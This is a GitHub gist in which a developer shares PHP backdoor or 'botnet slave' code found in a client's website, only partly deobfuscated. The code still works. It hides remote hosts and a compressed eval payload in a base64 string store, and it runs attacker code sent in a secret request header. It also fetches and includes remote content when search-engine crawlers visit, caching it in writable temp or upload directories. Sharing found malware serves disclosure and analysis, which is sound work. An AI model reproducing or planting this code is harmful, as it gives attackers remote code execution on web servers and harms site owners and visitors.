Instantly share code, notes, and snippets.

@ryepdx /gist:5015935
Created Feb 22, 2013

Embed
What would you like to do?
Download ZIP
The botnet slave code I found in a client's codebase last night, deobfuscated and cleaned up a bit.
Raw
gistfile1.php
<?php
if (!function_exists('get_string')){
$GLOBALS['string_store'] = 'uUY3VybARX2luaXQ.YWxsb3dfdXJsX2ZvcGVuMQaHR0cDovLwu_JndheT1maWxlX2dldF9jb250ZW50cwDX3NldG9wdAf}lX2V4ZWMZJndheT1jdXJswxO#!~Lwb3Nvbi5pbgYS1pbi1hLWNpcmNsZS5jb20w^ecGhwYWlkZS5jb20kYcdwPSBWV8OgLcZGlzcGxheV9lcnJvcnMQsKZGV0ZXJtaW5hdG9yuBZnRwMTMLKMi4xOAGUVFRT1EwT1EwT09RT1FP~YmFzZTY0X2RlY29kZQ_WYmFzZTY0X2VuY29kZQt~SFRUUF9IT1NU)X;dW5pb24Oc2VsZWN0U&OPMeUkVRVUVTVF9VUkkP_@U0NSSVBUX05BTUUrUVVFUllfU1RSSU5HPw #HLL3RtcC8uZm9udC11bml4!=gVE1QGqu_VEVNUAw*PVE1QRElSyfhkdG1wQ%nd3AtY29udGVudC91cGxvYWRzd3AtY29udGVudC9jYWNoZQ@}dXBsb2FkX3RtcF9kaXIx^u@dL3RtcALLgdmVyc2lv %(LLQj;qxLXBocA=@rSFRUUF9FWEVDUEhQ ~$b3V0b2s~~ySFRUUF9VU0VSX0FHRU5URcoYLAKgZ29vZ2xlLHlhaG9vLGJpbmcsbXNuYm90LGFzayxiYWlkdSx5YW5kZXgL3BnLnBocD91PQ!*Jms9KHTJnQ9cGhwJnA9tJnY9Qg}ZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5VlYvdHYya2dRL2xjMktJcHN5Zlg1Z1hsY3ppZFFTaTZXY2pnUXFGU2xrVVhOa2xnMU5yTE5wVkhFLzM0eis3Q1h4RW52bWg4S083TXpPNC92bXlIWkVPMWtUVGRKUnRkYVowMHJXbXlUYkZYbFJVZlhYOGhtbjhWVmttZEVsVVFibW0rMDB5Qkk3ZFEyeU5ucHpMSm00WXo0WkxxOHZ0YkpDMmxPdGtsYzVGV3lwVnBWN0tsK1RncGE3WXVNcUNiZzlOQjRlcURWSmttcEJqYmdMelRBV0RnTHcxQkhzNkVGbjhGc2tBYTJuYWFwNWhpa0IvZVpKVHNBaWRBeGE0MmhRZnFnTVVxeUpDcHBwZFVDdTI4UXg5SU5nZzlJSUE5TTVhRkZSU2UrNHRMRlExMkVDWUZhL2dnZmpEZWpPTThxbWxWbFk4SUYvN2FsRTVPSWdOZ25GcEhaMlBRZ2p5NDRxdk1qVEdObWFGcFNmSjdNVUVSL0ppVzRFREZqbVU0RHNHS25FUDVJbkdvaUtmQ2xMU2tEaDczcUhQMkVvVFZyVFp3bk1pZnNhTUtMUVM2VzgrdndaaEhCZndiNW41SGFsZ3RxanY2aDRhdkorUE5rYm14V0VQcUhpdlBKWWptZkx1Ymo2ZTBsWEJBOTlyNytSVGlkVGk0V2krRHZTYmhjR01SaktZQkh6bVlzZVR3YjhoNmFpdmRGR3NWcFhsTGxGTXRCdDd2cVdST1hvUWlObVNaV2UyQVF5UEtocVNyVGtWWEZGdUlRUU9lYk1vOS81RHVhTmEwL3NIajd3MWVERlJrTTgwZmpDeVI4ZUNlQ2x0WG1uQnpERTBMYTdQYXlmUkMvbmI4bUMvSWlLblU0ZTFvOSsvZ1NXcEdyeGVMbU45dTB2aFhmc3F1OHJINUhOZmEwQXg1MWVJL1pBUVBlemRWTkZONDI3V003TnVMRXhQTXZrL2x0RUU1YmZDOUxXbndhUHdCbTBEZzN4b3hMQjArUFNBWW5IL0NQaUU4bloyZEVlOFUzNUZNai9nTmUwMlRLeEl3RFpKWEgyTTZBVWRGb0krc3Q2WW4xQlNNZStuT1g1bXVxZGVvM0d0SWs2TzB6WkJpaGZXZmROM2hPdHUzM1FJLzV4RC9vRHN0aWhSb1h4ZXBab1NISFpkQlN3R2E3Y09TNFIwY2VBdEJEWk5WaytsUWtGV1ZOQ3Y4TUJuRkl4WXRzSDd3TDdDV2FqaXNwNU1lSkR0UkhHMkdJWDZrTm5hdTVRb21JcGZhZjd5c29PTTlJaUZ3T1dvQk1NRW5qeDF4NU94S1NxNXRDVWVtaWdjZTZTRncwV2Y0NnJFcHZDWDJBQ1JqcXZPMzVVR3VrRGtMSDdnbSs1MnczOHh1eEl3WUZ4NmlsU055QkdES1FJT2dsUmRMMTJIeEFHTUJaa0NxaVhnOGNEWmdJNkRnSUZOR2dGbkV3K2E4cHRKYVlmbGtWVlo3bVQ3VFFScWZSN1dRT1VMcHI5SzBlSTFOc3RFMWUwRlg4Q0hXTkVOQ3Jrb2hrK244MldjZTZnOGxkenRzZURwdDZ1d2pZUHRhYldiZ1QxKy85Rmo2VE0rbDlXeERKNEwvWk9zQ3J0Sk9rWk5CNUcyTFhaVjE5enlmdSszTEczMi9GUFp1TGtUSmJVNGhkRG0xeC95dnpwcm9DREJGOU9Pbytzc2l4SUprYTJOdVhaVzI3VmNmSmhnS2NCLzVvdS9ia01EQkZYNXFDWjBVejh0NkQxa3Y5ZFZKa0t5QytLTG9NcmlkUnBKdWZnemtNdTNEK0ZiemRqT2RqK0NpMmdpQ29XVWFOYWlnMm9wYjNkUjFBYUZlL2J4ZTZGa0tFQ3lmVEwrOWNPNWE0ckVWYUpkS2FDSzJoZ3k0dVNsMjlWUUw5NUxTTGtGd2NCK042cytGNURFRkRYU1ZTai9zM3lCR3FSTm9RVjdnSHdGemdjRG9SaTRBNGxOdFlhcHQrYS83NXBsbEd5S2lyN3lrOXZzbWVqdHNZUHp3bjM4SC9qM3BDVk51ZC95WStqMitrcG1nYjRhS3VVZ2ZIZVBRMUdpOFhWNTE3M3hkcWtvTWxvNDRFVnl0bVdZRU15WWlLUTQrUGRrR2lxcUNQbWF2M2s1UU5HRUdPYmVqekdFMGkrbkRLMEg5V3Fid0ZObjd4UEp3TTNhTzZJZis3T3B0QnNDTlhtc1UreW9Uelh4V1FRZWFyeXZmeEkvL0tmaHpFNlg1Tm96eUxxVHprTE1kWE5BVHZDRFpCbXNVNHhjV1JKR3EyUDQ4K3BtcHZ5R2ZGRVZYTGJhTFc2dGtJUVRXb0hzNStENlo2M1htMi9ZckkrUk9NV25yaSs1ZHNjK1pxYXFqOFJ4UU9lblZWN1BVQk8zYVhUMWt3MGhTME4reGlrbVZyTllLK3hSYW1saDdvMitJSzd4bzJBQU5PT00xUE83Ym93SUxVL0xvN2YxV1N3M0hudzkrL2t4VVhuQT09IikpKTs(cHJlZ19yZXBsYWNlu&';
function get_string($a, $b){
$c=$GLOBALS['string_store'];
$d=pack('H*','626173'.'6536345f6465636f6465');
return $d(substr($c, $a, $b));
};
}
if (!defined("determinator")){
function determinator_feof($IIl1l1, &$Q00QOQ = NULL) {
$Q00QOQ = microtime(true);
return feof($IIl1l1);
}
function getfile($Q0Q0QO, $QOQOOO){
$QO0OQO = get_string(2, 6);
$IIl11I = $QO0OQO.get_string(9, 7);
@ini_set(get_string(17, 20), 1);
if (@ini_get(get_string(17, 20)) == get_string(37, 2)) {
$Q0Q000=@file_get_contents(get_string(39, 10) . $Q0Q0QO . $QOQOOO. get_string(51, 30));
return $Q0Q000;
} elseif (function_exists($IIl11I)){
$I1ll1l = @$IIl11I();
$IIlIl1 = $QO0OQO.get_string(82, 10);
$Q0OO0Q = $QO0OQO.get_string(95, 7);
@$IIlIl1($I1ll1l, CURLOPT_URL, get_string(39, 10) . $Q0Q0QO . $QOQOOO. get_string(103, 12));
@$IIlIl1($I1ll1l, CURLOPT_HEADER,false);
@$IIlIl1($I1ll1l, CURLOPT_RETURNTRANSFER,true);
@$IIlIl1($I1ll1l, CURLOPT_CONNECTTIMEOUT, 5);
$QQOQQQ = @$Q0OO0Q($I1ll1l);
@curl_close($I1ll1l);
if (empty($QQOQQQ)){
$QQOQQQ = get_string(118, 0);
}
return $QQOQQQ;
} else {
$IIl1l1 = @fsockopen($Q0Q0QO, 80, $QOQ0Q0, $I1lI11, 5);
if ($IIl1l1) {
$Q0OQ00 = get_string(118, 0);
$Q00QOQ = NULL;
@fputs($IIl1l1, "GET {$QOQOOO}&way=socket HTTP/1.0\r\nHost: {$Q0Q0QO}\r\n");
$II1I1I = PHP_OS.get_string(121, 2).PHP_VERSION;
@fputs($IIl1l1, "User-Agent: {$II1I1I}\r\n\r\n");
while(!determinator_feof($IIl1l1, $Q00QOQ) && (microtime(true) - $Q00QOQ) < 2){
$Q0OQ00 .= @fgets($IIl1l1, 128);
}
@fclose($IIl1l1);
$Q0OOQO = explode("\r\n\r\n", $Q0OQ00);
unset($Q0OOQO[0]);
return implode("\r\n\r\n", $Q0OOQO);
}
}
}
$QQ00OQ = Array(get_string(123, 10), get_string(133, 23), get_string(159, 15));
function write($QQOOOO,$QO0OOQ){
if ($IIIlI1=@fopen($QQOOOO,get_string(177, 2))){
@fwrite($IIIlI1,$QO0OOQ);
@fclose($IIIlI1);
}
}
function output($Q0OOOO, $IIllIl){
echo get_string(182, 3).$Q0OOOO.get_string(185, 2).$IIllIl."\r\n";
}
@ini_set(get_string(189, 19), 0);
define(get_string(211, 16), 1);
$QO0OQQ=get_string(229, 7);
$QQOQQ0=get_string(238, 6);
$QOO00Q=get_string(245, 20);
$IlI1Il=get_string(266, 18);
$I11III=get_string(286, 18);
$Q0Q0QO=get_string(39, 10);
$Q0Q0QO.=strtolower(@$_SERVER[get_string(306, 12)]);
foreach ($_GET as $Q0OOOO=>$IIllIl){
if (strpos($IIllIl,get_string(321, 7))){
$_GET[$Q0OOOO]=get_string(118, 0);
} elseif (strpos($IIllIl,get_string(329, 8))){
$_GET[$Q0OOOO]=get_string(118, 0);
}
}
if(!isset($_SERVER[get_string(343, 15)])) {
$_SERVER[get_string(343, 15)] = @$_SERVER[get_string(361, 15)];
if(@$_SERVER[get_string(377, 16)]) {
$_SERVER[get_string(343, 15)] .= get_string(393, 2) . @$_SERVER[get_string(377, 16)];
}
}
if ($IIlI1l=$Q0Q0QO.@$_SERVER[get_string(343, 15)]){
$IIIlII=@md5($Q0Q0QO.$QQOQQ0.PHP_OS.$QOO00Q);
$Il1Ill=dirname(__FILE__).DIRECTORY_SEPARATOR;
$IIlIII = Array(
get_string(399, 20),
@$_SERVER[get_string(422, 4)],
@$_SERVER[get_string(430, 6)],
@$_ENV[get_string(422, 4)],
@$_ENV[get_string(439, 8)],
@$_ENV[get_string(430, 6)],
$Il1Ill.get_string(451, 4),
$Il1Ill.get_string(458, 24),
$Il1Ill.get_string(482, 22),
@ini_get(get_string(506, 19)),
get_string(530, 6),
);
foreach ($IIlIII as $I1lll1){
if (!empty($I1lll1)){
$I1lll1.=DIRECTORY_SEPARATOR;
if (@is_writable($I1lll1)){
$Il1Ill = $I1lll1;
break;
}
}
}
$tmp=$Il1Ill.get_string(537, 2).$IIIlII;
if (@$_SERVER["HTTP_Y_AUTH"]==$IIIlII){
echo "\r\n";
@output(get_string(539, 8), $QQOQQ0.get_string(551, 2).$QO0OQQ.get_string(557, 6));
if ($IlIlI1=$IlI1Il(@$_SERVER[get_string(566, 16)])){
@eval($IlIlI1);
echo "\r\n";
@output(get_string(585, 4), get_string(589, 3));
}
exit(0);
}
if (@is_file($tmp)){
@touch($tmp);
@include_once($tmp);
} else {
$IIlI1l=@urlencode($IIlI1l);
$Q0Q00Q = @strtolower(@$_SERVER[get_string(595, 20)]);
foreach (explode(get_string(619, 2), get_string(623, 55)) as $I1ll11){
if (strpos($Q0Q00Q, $I1ll11)!==False){
if (@touch($tmp)){
$QOQOOO = get_string(678, 14).$IIlI1l.get_string(694, 4).$IIIlII.get_string(701, 12).$QO0OQQ.get_string(714, 4).$QQOQQ0;
$I1IIII = getfile($QQ00OQ[0], $QOQOOO);
@touch($tmp);
}
break;
}
}
}
}
}
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment